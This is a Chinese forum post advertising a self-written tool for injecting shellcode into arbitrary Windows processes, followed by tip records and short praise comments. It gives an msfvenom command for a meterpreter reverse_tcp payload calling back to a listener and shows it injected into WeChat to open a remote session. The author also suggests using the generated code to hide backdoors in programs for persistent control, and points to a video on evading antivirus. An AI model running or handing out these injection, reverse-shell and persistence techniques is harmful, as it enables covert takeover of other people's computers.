文章转载自《通过听觉入侵你》,由本人原创
本次给大家带来一款本人写的小工具
可自定义shellcode注入任意进程,并且可生产对应的代码给自己的代码调用
这里第二个输入框,可以直接输入msf生成的payload
就会自动转换成易语言可调用的机器码,可以用此来直接注入指定的进程
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.93.131 lport=6666 -f c
直接将生成的shellcode复制进工具里面 转换结束后便可以进行注入了
在这里选择需要注入的进程
这里我选择微信,并且点击注入 这边msf便成功上线了
双击下面的输入框便会生成线程注入的代码 给自己的代码调用
当然了也可以生成利用自身程序给msf反弹shell的代码
选择最下角的选项 再双击输入框即可
将生成的代码复制进易语言,然后调用对应的函数 便可以实现线程注入了
可以使用此方法在自己的程序中放后门 进行一个持久化的控制 当然了需要一个公网服务器来接收反弹
直接调用 生成的函数 程序界面会卡住
可以另开一个线程来执行这段代码启动线程(&调用此函数)
当然了这里也不仅仅是只可以注入个msf的payload
这里也可以自己提取shellcode 然后进行注入 生成
在第一个输入框输入自己提取的shellcode,注意是10进制的,使用半角符的逗号进行区分
这里是手动提取shellcode然后进行注入的截图
这里是我自己写的一个小程序,现在通过易语言的万能特征码 ff 55 fc 5f 5e寻找到了对应的代码区域,现在再进行提取机器码
对提取出来的asm汇编指令进行转换
然后再进行注入,可以看到成功拿到flag 并且再不修改程序代码的情况下 利用了本程序在目标进程执行任意代码!
利用生成的代码 如果编译后绕过杀毒软件 可以看一下 下面提供的视频
生成的payload请配合精易模块使用
视频以及工具下载地址
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
Track-手电筒 | 0.00 | 0 | 2020-12-08 15:03:26 | 一个受益终生的帖子~~ |
Track-手电筒 | 5.00 | 0 | 2020-12-08 15:03:23 | 一个受益终生的帖子~~ |
Track-手电筒 | 10.00 | 0 | 2020-12-08 15:03:59 | 一个受益终生的帖子~~ |
奖励系统 | 100.00 | 0 | 2020-11-19 09:09:51 | 投稿满 10 赞奖励 |
奖励系统 | 50.00 | 0 | 2020-11-11 13:01:41 | 投稿满 5 赞奖励 |
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
辣条姐
发表于 2020-11-10
来学习学习
评论列表
加载数据中...
tgs
发表于 2020-11-10
厉害了我的大佬
评论列表
加载数据中...
小手冰凉
发表于 2020-11-10
秀
评论列表
加载数据中...
Yaoヽ药药
发表于 2020-11-10
点赞啊 各位
评论列表
加载数据中...
柠檬
发表于 2020-11-11
666
评论列表
加载数据中...
奥展
发表于 2020-11-11
123
评论列表
加载数据中...
lxx欣
发表于 2020-11-18
学习学习
评论列表
加载数据中...
904815041
发表于 2020-11-18
1
评论列表
加载数据中...
tianmao
发表于 2020-11-19
666
评论列表
加载数据中...
TanSon
发表于 2020-11-23
1
评论列表
加载数据中...
noob3r
发表于 2020-11-23
1
评论列表
加载数据中...
善鑫未名
发表于 2020-12-12
来学习,赞
评论列表
加载数据中...
darren
发表于 2020-12-31
666
评论列表
加载数据中...
黑影
发表于 2021-1-5
11111111
评论列表
加载数据中...
1614895030
发表于 2021-1-21
66666
评论列表
加载数据中...
八两二号
发表于 2021-8-16
秀
评论列表
加载数据中...
326516678
发表于 2021-9-6
不愧是阿药
评论列表
加载数据中...
君叹
发表于 2022-3-14
nb
评论列表
加载数据中...